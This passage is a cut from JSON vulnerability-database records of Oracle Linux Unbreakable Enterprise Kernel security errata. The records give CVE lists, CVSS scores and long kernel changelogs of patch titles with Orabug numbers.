"oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17972", "CVE-2017-12153", "CVE-2018-3639"], "description": "[4.1.12-124.25.1]\n- x86/bugs: Fix the AMD SSBD usage of the SPEC_CTRL MSR (Tom Lendacky) [Orabug: 
28870524] {CVE-2018-3639}\n- x86/bugs: Add AMD's SPEC_CTRL MSR usage (Konrad Rzeszutek Wilk) [Orabug: 28870524] {CVE-2018-3639}\n- x86/cpufeatures: rename X86_FEATURE_AMD_SSBD to X86_FEATURE_LS_CFG_SSBD (Mihai Carabas) [Orabug: 28870524] {CVE-2018-3639}\n- Make file credentials available to the seqfile interfaces (Linus Torvalds) [Orabug: 29114879] {CVE-2018-17972}\n- proc: restrict kernel stack dumps to root (Jann Horn) [Orabug: 29114879] {CVE-2018-17972}\n- x86/speculation: Clean up retpoline code in bugs.c (Alejandro Jimenez) [Orabug: 29211617] \n- x86, modpost: Replace last remnants of RETPOLINE with CONFIG_RETPOLINE (WANG Chao) [Orabug: 29211617] \n- x86/build: Fix compiler support check for CONFIG_RETPOLINE (Masahiro Yamada) [Orabug: 29211617] \n- x86/retpoline: Remove minimal retpoline support (Zhenzhong Duan) [Orabug: 29211617] \n- x86/retpoline: Make CONFIG_RETPOLINE depend on compiler support (Zhenzhong Duan) [Orabug: 29211617] \n- nl80211: check for the required netlink attributes presence (Vladis Dronov) [Orabug: 29245533] {CVE-2017-12153} {CVE-2017-12153}\n- scsi: lpfc: Fix PT2PT PRLI reject (reapply patch) (James Smart) [Orabug: 29281346]", "edition": 2, "modified": "2019-02-06T00:00:00", "published": "2019-02-06T00:00:00", "id": "ELSA-2019-4531", "href": "http://linux.oracle.com/errata/ELSA-2019-4531.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-14489", "CVE-2017-7618", "CVE-2017-15649", "CVE-2017-14106", "CVE-2017-16527", "CVE-2017-10661", "CVE-2017-1000112", "CVE-2017-12192", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-16650", "CVE-2016-10318", "CVE-2017-7542", "CVE-2017-2618", "CVE-2017-12154", "CVE-2017-1000405", "CVE-2017-12190"], "description": "[4.1.12-112.14.1]\n- ext4: fix off-by-one on max nr_pages in ext4_find_unwritten_pgoff() (Eryu 
Guan) [Orabug: 27233471]\n[4.1.12-112.13.1]\n- cgroup: make sure a parent css isnt offlined before its children (Tejun Heo) [Orabug: 27179269]\n[4.1.12-112.12.1]\n- ctf: allow dwarf2ctf to run as root but produce no output (Nick Alcock) [Orabug: 27133094] \n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215221] {CVE-2017-16650}\n- ctf: fix thinko preventing linking of out-of-tree modules when CTF is off (Nick Alcock) [Orabug: 27215293] \n- Revert 'firmware: dmi_scan: add SBMIOS entry and DMI tables' (Dan Duval) [Orabug: 27100376]\n[4.1.12-112.11.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200880] {CVE-2017-1000405}\n- uek-rpm: Update linux firmware package for OL7 (Dhaval Giani) [Orabug: 27210206] \n- uek-rpm: Update firmware for OL6 UEK spec file (Dhaval Giani) [Orabug: 27210204] \n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187218] \n- xen/time: do not decrease steal time after live migration on xen (Dongli Zhang) [Orabug: 26770163] \n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148272] {CVE-2017-16527}\n- scsi: qla2xxx: Fix NULL pointer access due to redundant fc_host_port_name call (Quinn Tran) [Orabug: 27149785] \n- scsi: qla2xxx: Initialize Work element before requesting IRQs (Himanshu Madhani) [Orabug: 27149785] \n- scsi: qla2xxx: Fix uninitialized work element (Quinn Tran) [Orabug: 27149785]\n[4.1.12-112.10.1]\n- Revert 'Improves clear_huge_page() using work queues' (Jack Vogel) [Orabug: 27055693] \n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069060] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069060] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069060] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric 
Dumazet) [Orabug: 27069060] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069060] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069060] {CVE-2017-15649}\n- scsi: qla2xxx: Fix slow mem alloc behind lock (Quinn Tran) [Orabug: 27100873]\n[4.1.12-112.9.1]\n- xfs: Fix off-by-in in loop termination in xfs_find_get_desired_pgoff() (Jan Kara) [Orabug: 26862911] \n- xfs: Fix missed holes in SEEK_HOLE implementation (Jan Kara) [Orabug: 26862911] \n- ext4: fix off-by-in in loop termination in ext4_find_unwritten_pgoff() (Jan Kara) [Orabug: 26862911] \n- ext4: fix SEEK_HOLE (Jan Kara) [Orabug: 26862911] \n- rtc: cmos: century support (Sylvain Chouleur) [Orabug: 27025943] \n- ocfs2: code clean up for direct io (Ryan Ding) [Orabug: 27117733] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119610] \n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 26326914]\n[4.1.12-112.8.1]\n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- uek-rpm: Add more missing modules to OL7 ueknano (Somasundaram Krishnasamy) [Orabug: 27028326] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069034] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069034] {CVE-2017-12190}\n- usb: Quiet down false peer failure messages (Don Zickus) [Orabug: 26669801] \n- ovl: during copy up, switch to mounters creds early (Vivek Goyal) [Orabug: 27052885] \n- ovl: lookup: do getxattr with mounters permission (Miklos Szeredi) [Orabug: 27052885] \n- ovl: get rid of the dead code left from broken (and disabled) optimizations (Al Viro) [Orabug: 27052885] \n- selinux: Implement dentry_create_files_as() hook (Vivek Goyal) [Orabug: 27052885] \n- security, overlayfs: Provide hook to correctly label newly 
created files (Vivek Goyal) [Orabug: 27052885] \n- selinux: Pass security pointer to determine_inode_label() (Vivek Goyal) [Orabug: 27052885] \n- selinux: Implementation for inode_copy_up_xattr() hook (Vivek Goyal) [Orabug: 27052885] \n- security,overlayfs: Provide security hook for copy up of xattrs for overlay file (Vivek Goyal) [Orabug: 27052885] \n- selinux: Implementation for inode_copy_up() hook (Vivek Goyal) [Orabug: 27052885] \n- security, overlayfs: provide copy up security hook for unioned files (Vivek Goyal) [Orabug: 27052885] \n- selinux: delay inode label lookup as long as possible (Paul Moore) [Orabug: 27052885] \n- selinux: Add accessor functions for inode->i_security (Andreas Gruenbacher) [Orabug: 27052885] \n- selinux: Create a common helper to determine an inode label [ver #3] (David Howells) [Orabug: 27052885] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27056291] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27056291] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27056291] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27056291] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077793] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077793] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077793] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077793] \n- uek-rpm: add update-el-x86; fix-up ol6/update-el (Chuck Anderson) [Orabug: 26844981] \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 26994454] \n- qla2xxx: Update driver version to 9.00.00.00.40.0-k 
(Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix delayed response to command for loop mode/direct connect. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Use IOCB interface to submit non-critical MBX. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add async new target notification (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Allow relogin to proceed if remote login did not finish (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix sess_lock & hardware_lock lock order problem. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix inadequate lock protection for ABTS. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix request queue corruption. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix memory leak for abts processing (Quinn Tran) [Orabug: 26844197] \n- scsi: qla2xxx: Fix ql_dump_buffer (Joe Perches) [Orabug: 26844197] \n- scsi: qla2xxx: Fix response queue count for Target mode. (Michael Hernandez) [Orabug: 26844197] \n- scsi: qla2xxx: Cleaned up queue configuration code. (Michael Hernandez) [Orabug: 26844197] \n- qla2xxx: Fix a warning reported by the 'smatch' static checker (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Simplify usage of SRB structure in driver (Bart Van Assche) [Orabug: 26844197] \n- qla2xxx: Simplify usage of SRB structure in driver (Joe Carnuccio) [Orabug: 26844197] \n- qla2xxx: Improve RSCN handling in driver (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add framework for async fabric discovery (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Track I-T nexus as single fc_port struct (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: introduce a private sess_kref (Christoph Hellwig) [Orabug: 26844197] \n- qla2xxx: Use d_id instead of s_id for more clarity (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix wrong argument in sp done callback (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Remove SRR code (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Cleanup TMF code translation from qla_target (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Disable out-of-order processing 
by default in firmware (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix erroneous invalid handle message (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Reduce exess wait during chip reset (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Terminate exchange if corrupted (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix crash due to null pointer access (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Collect additional information to debug fw dump (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Reset reserved field in firmware options to 0 (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Include ATIO queue in firmware dump when in target mode (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Fix wrong IOCB type assumption (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add DebugFS node for target sess list. (Quinn Tran) [Orabug: 26844197] \n- tcm_qla2xxx: Convert to target_alloc_session usage (Nicholas Bellinger) [Orabug: 26844197] \n- qla2xxx: Use ATIO type to send correct tmr response (Swapnil Nagle) [Orabug: 26844197] \n- qla2xxx: Fix TMR ABORT interaction issue between qla2xxx and TCM (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Move atioq to a different lock to reduce lock contention (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Remove dependency on hardware_lock to reduce lock contention. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Replace QLA_TGT_STATE_ABORTED with a bit. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Wait for all conflicts before acking PLOGI (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Delete session if initiator is gone from FW (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Added interface to send explicit LOGO. (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Add FW resource count in DebugFS. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Enable Target counters in DebugFS. 
(Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: terminate exchange when command is aborted by LIO (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: drop cmds/tmrs arrived while session is being deleted (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: disable scsi_transport_fc registration in target mode (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: added sess generations to detect RSCN update races (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Abort stale cmds on qla_tgt_wq when plogi arrives (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: delay plogi/prli ack until existing sessions are deleted (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: cleanup cmd in qla workqueue before processing TMR (Swapnil Nagle) [Orabug: 26844197] \n- qla2xxx: Add flush after updating ATIOQ consumer index. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Enable target mode for ISP27XX (Himanshu Madhani) [Orabug: 26844197]\n[4.1.12-112.7.1]\n- x86/platform/uv: Fix kdump for UV (Kirtikar Kashyap) [Orabug: 27031280] \n- firmware: dmi_scan: add SBMIOS entry and DMI tables (Ivan Khoronzhuk) [Orabug: 27045425] \n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050237] {CVE-2017-12192}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052680] \n- scsi: mpt3sas: Bump mpt3sas driver version to v16.100.00.00 (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Adding support for SAS3616 HBA device (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix possibility of using invalid Enclosure Handle for SAS device after host reset (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Display chassis slot information of the drive (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Updated MPI headers to v2.00.48 (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix IO error occurs on pulling out a drive from RAID1 volume created on two SATA drive (Sreekanth 
Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix removal and addition of vSES device during host reset (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Reduce memory footprint in kdump kernel (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fixed memory leaks in driver (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Processing of Cable Exception events (Sreekanth Reddy) [Orabug: 26894579] \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044703] \n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036905] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- uek-rpm: Update kernel-ueknanos provides list. (Somasundaram Krishnasamy) [Orabug: 27022769] \n- uek-rpm: Add more modules to ueknano for OL7 (Somasundaram Krishnasamy) [Orabug: 27015961] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001687] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- dtrace: Add CTF archive to the UEK nano package (Tomas Jedlicka) [Orabug: 27039123] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Dhaval Giani) [Orabug: 27037801] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. 
Shutemov) [Orabug: 26763484]\n[4.1.12-112.6.1]\n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 26808507] \n- rds: Proper init/exit declaration for module init/exit function (Ka-Cheong Poon) [Orabug: 26937730] \n- rds: Remove .exit from struct rds_transport (Ka-Cheong Poon) [Orabug: 26937730] \n- smartpqi: update driver version (Don Brace) [Orabug: 26882397] \n- smartpqi: cleanup raid map warning message (Kevin Barnett) [Orabug: 26882397] \n- smartpqi: update controller ids (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: remove the smp_handler stub (Christoph Hellwig) [Orabug: 26882397] \n- scsi: smartpqi: change driver version to 1.1.2-125 (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: add in new controller ids (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: update kexec and power down support (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: cleanup doorbell register usage. (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: update pqi passthru ioctl (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: enhance BMIC cache flush (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: add pqi reset quiesce support (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: make pdev pointer names consistent (Kevin Barnett) [Orabug: 26882397] \n- udp: consistently apply ufo or fragmentation (Willem de Bruijn) [Orabug: 26921314] {CVE-2017-1000112}\n- be2net: fix TSO6/GSO issue causing TX-stall on Lancer/BEx (Suresh Reddy) [Orabug: 26928620] \n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011248] {CVE-2017-7542}\n- xfs: use dedicated log worker wq to avoid deadlock with cil wq (Brian Foster) [Orabug: 27013239] \n- nvme: honor RTD3 Entry Latency for shutdowns (Martin K. 
Petersen) [Orabug: 26929569]\n[4.1.12-112.5.1]\n- uek-rpm: Build kernel ueknano rpm for OL7 (Somasundaram Krishnasamy) [Orabug: 26803594] \n- uek/config: enable NVME SG_IO support by default (Shan Hai) [Orabug: 26981802] \n- nvme: report the scsi TUR state correctly (Shan Hai) [Orabug: 26981802] \n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesnt parse nlmsg properly (Xin Long) [Orabug: 26988631] {CVE-2017-14489}\n- CVE-2016-10318 missing authorization check fscrypt_process_policy (Jack Vogel) [Orabug: 26989776] \n- ovl: fix get_acl() on tmpfs (Miklos Szeredi) [Orabug: 26975443]\n[4.1.12-112.2.1]\n- ixgbe: Initialize 64-bit stats seqcounts (Florian Fainelli) [Orabug: 26785078] \n- ixgbe: Disable flow control for XFI (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Do not support flow control autonegotiation for X553 (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Update NW_MNG_IF_SEL support for X553 (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Enable LASI interrupts for X552 devices (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Ensure MAC filter was added before setting MACVLAN (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: pci_set_drvdata must be called before register_netdev (Jeff Mahoney) [Orabug: 26785078] \n- ixgbe: Resolve cppcheck format string warning (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: fix writes to PFQDE (Emil Tantilov) [Orabug: 26785078] \n- ixgbevf: Bump version number (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Bump version number (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: check for Tx timestamp timeouts during watchdog (Jacob Keller) [Orabug: 26785078] \n- ixgbe: add statistic indicating number of skipped Tx timestamps (Jacob Keller) [Orabug: 26785078] \n- ixgbe: avoid permanent lock of *_PTP_TX_IN_PROGRESS (Jacob Keller) [Orabug: 26785078] \n- ixgbe: fix race condition with PTP_TX_IN_PROGRESS bits (Jacob Keller) [Orabug: 26785078] \n- net: better skb->sender_cpu and skb->napi_id cohabitation (Eric Dumazet) [Orabug: 26953388] [Orabug: 
26591689] \n- uek-rpm: Clean up installed directories when uninstalling kernel-ueknano (Somasundaram Krishnasamy) [Orabug: 26929773] \n- uek-rpm: Add missing ko modules to nano rpm (Somasundaram Krishnasamy) [Orabug: 26929773] \n- i40e: point wb_desc at the nvm_wb_desc during i40e_read_nvm_aq (Jacob Keller) [Orabug: 26785018] \n- i40e: avoid NVM acquire deadlock during NVM update (Anjali Singhai Jain) [Orabug: 26785018] \n- i40e/i40evf: avoid dynamic ITR updates when polling or low packet rate (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: remove ULTRA latency mode (Jacob Keller) [Orabug: 26785018] \n- i40e: invert logic for checking incorrect cpu vs irq affinity (Jacob Keller) [Orabug: 26785018] \n- i40e: initialize our affinity_mask based on cpu_possible_mask (Jacob Keller) [Orabug: 26785018] \n- i40e: move enabling icr0 into i40e_update_enable_itr (Jacob Keller) [Orabug: 26785018] \n- i40e: remove workaround for resetting XPS (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix for unused value issue found by static analysis (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: 25G FEC status improvements (Mariusz Stachura) [Orabug: 26785018] \n- i40e: force VMDQ device name truncation (Jacob Keller) [Orabug: 26785018] \n- i40evf: fix possible snprintf truncation of q_vector->name (Jacob Keller) [Orabug: 26785018] \n- i40e: Use correct flag to enable egress traffic for unicast promisc (Akeem G Abodunrin) [Orabug: 26785018] \n- i40e: prevent snprintf format specifier truncation (Jacob Keller) [Orabug: 26785018] \n- i40e: Store the requested FEC information (Mariusz Stachura) [Orabug: 26785018] \n- i40e: Update state variable for adminq subtask (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: synchronize nvmupdate command and adminq subtask (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: prevent changing ITR if adaptive-rx/tx enabled (Alan Brady) [Orabug: 26785018] \n- i40evf: use netdev variable in reset task (Alan Brady) [Orabug: 26785018] \n- i40e: move check 
for avoiding VID=0 filters into i40e_vsi_add_vlan (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: use cmpxchg64 when updating private flags in ethtool (Jacob Keller) [Orabug: 26785018] \n- i40e: Detect ATR HW Evict NVM issue and disable the feature (Anjali Singhai Jain) [Orabug: 26785018] \n- i40e: Fix a bug with VMDq RSS queue allocation (Anjali Singhai Jain) [Orabug: 26785018] \n- i40evf: prevent VF close returning before state transitions to DOWN (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: Initialize 64-bit statistics TX ring seqcount (Florian Fainelli) [Orabug: 26785018] \n- i40e: handle setting administratively set MAC address back to zero (Stefan Assmann) [Orabug: 26785018] \n- i40evf: remove unnecessary __packed (Tushar Dave) [Orabug: 26785018] \n- i40evf: add some missing includes (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: display correct UDP tunnel type name (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: remove mismatched type warnings (Jesse Brandeburg) [Orabug: 26785018] \n- i40e/i40evf: make IPv6 ATR code clearer (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: fix odd formatting and indent (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: fix up 32 bit timespec references (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: Handle admin Q timeout when releasing NVM (Paul M Stillwell Jr) [Orabug: 26785018] \n- i40e: remove WQ_UNBOUND and the task limit of our workqueue (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix for trace found with S4 state (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: fix incorrect variable assignment (Gustavo A R Silva) [Orabug: 26785018] \n- i40e: dont hold RTNL lock for the entire reset (Jacob Keller) [Orabug: 26785018] \n- i40e: clear only cause_ena bit (Shannon Nelson) [Orabug: 26785018] \n- i40e: fix disabling overflow promiscuous mode (Alan Brady) [Orabug: 26785018] \n- i40e: Add support for OEM firmware version (Filip Sadowski) [Orabug: 26785018] \n- i40e: genericize the partition bandwidth control (Shannon 
Nelson) [Orabug: 26785018] \n- i40e: Add message for unsupported MFP mode (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: Support firmware CEE DCB UP to TC map re-definition (Greg Bowers) [Orabug: 26785018] \n- i40e: Fix potential out of bound array access (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: comment that udp_port must be in host byte order (Jacob Keller) [Orabug: 26785018] \n- i40e: use dev_dbg instead of dev_info when warning about missing routine (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: update WOL and I40E_AQC_ADDR_VALID_MASK flags (Alice Michael) [Orabug: 26785018] \n- i40evf: assign num_active_queues inside i40evf_alloc_queues (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix a sleep-in-atomic bug (Jia-Ju Bai) [Orabug: 26785018] \n- i40e: fix handling of HW ATR eviction (Jacob Keller) [Orabug: 26785018] \n- i40evf: update i40evf.txt with new content (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: Add support for Adaptive Virtual Function (Preethi Banala) [Orabug: 26785018] \n- i40evf: drop i40e_type.h include (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: Check for memory allocation failure (Christophe Jaillet) [Orabug: 26785018] \n- i40e: check for Tx timestamp timeouts during watchdog (Jacob Keller) [Orabug: 26785018] \n- i40e: use pf data structure directly in i40e_ptp_rx_hang (Jacob Keller) [Orabug: 26785018] \n- i40e: add statistic indicating number of skipped Tx timestamps (Jacob Keller) [Orabug: 26785018] \n- i40e: avoid permanent lock of *_PTP_TX_IN_PROGRESS (Jacob Keller) [Orabug: 26785018] \n- i40e: fix race condition with PTP_TX_IN_PROGRESS bits (Jacob Keller) [Orabug: 26785018] \n- i40evf: disable unused flags (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: fix merge error in older patch (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: fix duplicate lines (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: hide unused variable (Arnd Bergmann) [Orabug: 26785018] \n- i40evf: allocate queues before we setup the interrupts 
and q_vectors (Jacob Keller) [Orabug: 26785018] \n- i40evf: remove I40E_FLAG_FDIR_ATR_ENABLED (Jacob Keller) [Orabug: 26785018] \n- i40e: remove hw_disabled_flags in favor of using separate flag bits (Jacob Keller) [Orabug: 26785018] \n- i40evf: remove needless min_t() on num_online_cpus()*2 (Jacob Keller) [Orabug: 26785018] \n- i40e: remove unnecessary msleep() delay in i40e_free_vfs (Jacob Keller) [Orabug: 26785018] \n- i40e: amortize wait time when disabling lots of VFs (Jacob Keller) [Orabug: 26785018] \n- i40e: Reprogram port offloads after reset (Alexander Duyck) [Orabug: 26785018] \n- i40e: rename index to port to avoid confusion (Jacob Keller) [Orabug: 26785018] \n- i40e: make use of i40e_reset_all_vfs when initializing new VFs (Jacob Keller) [Orabug: 26785018] \n- i40e: properly spell I40E_VF_STATE_* flags (Jacob Keller) [Orabug: 26785018] \n- i40e: use i40e_stop_rings_no_wait to implement PORT_SUSPENDED state (Jacob Keller) [Orabug: 26785018] \n- i40e: reset all VFs in parallel when rebuilding PF (Jacob Keller) [Orabug: 26785018] \n- i40e: split some code in i40e_reset_vf into helpers (Jacob Keller) [Orabug: 26785018] \n- i40e: remove I40E_FLAG_IN_NETPOLL entirely (Jacob Keller) [Orabug: 26785018] \n- i40e: reduce wait time for adminq command completion (Jacob Keller) [Orabug: 26785018] \n- i40e: fix CONFIG_BUSY checks in i40e_set_settings function (Jacob Keller) [Orabug: 26785018] \n- i40e: factor out queue control from i40e_vsi_control_(tx|rx) (Jacob Keller) [Orabug: 26785018] \n- i40e: dont hold RTNL lock while waiting for VF reset to finish (Jacob Keller) [Orabug: 26785018] \n- i40e: new AQ commands (Jingjing Wu) [Orabug: 26785018] \n- i40e/i40evf: Add tracepoints (Scott Peterson) [Orabug: 26785018] \n- i40evf: add client interface (Mitch Williams) [Orabug: 26785018] \n- i40e: dump VF information in debugfs (Mitch Williams) [Orabug: 26785018] \n- i40e: Fix support for flow director programming status (Alexander Duyck) [Orabug: 26785018] \n- 
i40e/i40evf: Remove VF Rx csum offload for tunneled packets (alice michael) [Orabug: 26785018] \n- i40evf: Use net_device_stats from struct net_device (Tobias Klauser) [Orabug: 26785018] \n- i40e: clean up historic deprecated flag definitions (Jacob Keller) [Orabug: 26785018] \n- i40e: remove I40E_FLAG_NEED_LINK_UPDATE (Alice Michael) [Orabug: 26785018] \n- i40e: remove extraneous loop in i40e_vsi_wait_queues_disabled (Jacob Keller) [Orabug: 26785018] \n- i40e: Simplify i40e_detect_recover_hung_queue logic (Alan Brady) [Orabug: 26785018] \n- i40e: Decrease the scope of rtnl lock (Maciej Sosin) [Orabug: 26785018] \n- i40e: Swap use of pf->flags and pf->hw_disabled_flags for ATR Eviction (Alexander Duyck) [Orabug: 26785018] \n- i40e: update error message when trying to add invalid filters (Jacob Keller) [Orabug: 26785018] \n- i40e: only register client on iWarp-capable devices (Mitch Williams) [Orabug: 26785018] \n- i40e: close client on remove and shutdown (Mitch Williams) [Orabug: 26785018] \n- i40e: register existing client on probe (Mitch Williams) [Orabug: 26785018] \n- i40e: remove client instance on driver unload (Mitch Williams) [Orabug: 26785018] \n- i40e: fix for queue timing delays (Wyborny, Carolyn) [Orabug: 26785018] \n- i40e/i40evf: Change the way we limit the maximum frame size for Rx (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Add legacy-rx private flag to allow fallback to old Rx flow (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Pull code for grabbing and syncing rx_buffer from fetch_buffer (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Use length to determine if descriptor is done (Alexander Duyck) [Orabug: 26785018] \n- drivers/char/mem.c: deny access in open operation when securelevel is set (Ethan Zhao) 